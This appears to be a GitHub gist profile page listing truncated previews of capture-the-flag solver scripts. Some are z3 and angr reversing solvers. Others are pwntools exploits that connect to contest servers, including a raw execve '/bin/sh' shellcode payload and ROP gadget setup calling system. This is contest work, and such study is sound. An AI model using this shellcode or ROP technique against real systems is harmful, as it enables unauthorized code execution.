Skip to content

Instantly share code, notes, and snippets.

View ywkw1717's full-sized avatar
🌴
On vacation

yyy ywkw1717

🌴
On vacation
17 followers · 18 following
View GitHub Profile
@ywkw1717
ywkw1717 / special_device_file
Created October 28, 2018 08:46
SECCON 2018 Online CTF Special Device File
#!/usr/bin/env python
def main():
key = [
"fbde15b0",
"ae2cc59b",
"27529ad0",
"432a8be5",
"271687b2",
@ywkw1717
ywkw1717 / special_instructions
Created October 28, 2018 09:01
SECCON 2018 Online CTF Special Instructions
#!/usr/bin/env python
def main():
key = ["35c36d03",
"c8fa2132",
"9f72275c",
"3ed1ca90",
"e32b4951",
"1c29ac51",
@ywkw1717
ywkw1717 / key_maker.py
Created April 22, 2019 12:13
ASIS CTF Quals 2019 Key maker
#!/usr/bin/env python
from z3 import *
def main():
cmp_to_local_148 = [0x758, 0x2c0, 0x808, 0x306, 0x251, 0x116, 0x2c9, 0x144, 0x5f7, 0x2d5, 0x3d7, 0x298, 0x88a, 0x2bf, 0xa86, 0x347]
cmp_to_local_188 = [0x14f, 0x6e8, 0x6db, 0x69b, 0x3ae, 0x403, 0x3ff, 0x6fd, 0x2f6, 0x515, 0x4fa, 0x6fa, 0x30c, 0x310, 0x26c, 0x540]
cmp_to_local_1c8 = [0x4ab, 0x3d4, 0x47c, 0x56f, 0x58a, 0x4ec, 0x32b, 0x3f1, 0x556, 0x486, 0x3cb, 0x481, 0x42c, 0x2e0, 0x3a4, 0x348]
cmp_to_local_208 = [0x798, 0x3ef, 0x5a0, 0x3d2, 0x4ad, 0x127, 0x585, 0x15e, 0x622, 0x385, 0x53a, 0x382, 0x3ae, 0x2d0, 0x24a, 0x2b1]
cmp_to_local_248 = [0x3ca, 0x5a7, 0x567, 0x8b1, 0x089, 0x48b, 0x538, 0x488, 0x15c, 0x505, 0x533, 0x4fd, 0x120, 0x2ca, 0x291, 0x2df]
@ywkw1717
ywkw1717 / speedrun-001.py
Created May 13, 2019 04:23
#!/usr/bin/env python
from pwn import *
import time
def main():
# conn = process("./speedrun-001")
conn = remote("speedrun-001.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
bss_addr = 0x6bbae0
@ywkw1717
ywkw1717 / speedrun-003.py
Created May 13, 2019 04:55
#!/usr/bin/env python
from pwn import *
def main():
conn = remote("speedrun-003.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
payload = "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x31\xf6\x56\x53\x54\x5f\xb0\x5a\xb0\x3b\x31\xd2\x31\xd2\x31\xd2\x31\xd2\x0f\x05"
@ywkw1717
ywkw1717 / speedrun-002.py
Last active May 13, 2019 06:26
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./speedrun-002")
# conn = remote("localhost", 3000)
conn = remote("speedrun-002.quals2019.oooverflow.io", 31337)
elf = ELF("./speedrun-002")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
@ywkw1717
ywkw1717 / babyrop.py
Created May 19, 2019 07:49
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop")
conn = remote("problem.harekaze.com", 20001)
pop_rdi_ret = 0x400683 #: pop rdi ; ret
system = 0x400490
@ywkw1717
ywkw1717 / babyrop2.py
Created May 19, 2019 07:49
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop2")
conn = remote("problem.harekaze.com", 20005)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
@ywkw1717
ywkw1717 / scramble.py
Created May 19, 2019 08:00
#!/usr/bin/env python
import angr
proj = angr.Project("./scramble", load_options={"auto_load_libs": False})
addr_main = 0x400680
initial_state = proj.factory.blank_state(addr=addr_main)
path_group = proj.factory.path_group(initial_state)
e = path_group.explore(find=(0x400737,), avoid=(0x4006fb,))
@ywkw1717
ywkw1717 / linear_operation.py
Created May 26, 2019 11:49
#!/usr/bin/env python
import angr
from claripy import BVS
proj = angr.Project("./linear_operation")
length = 63
flag = BVS("flag", length * 8)
addr_is_correct = 0x400607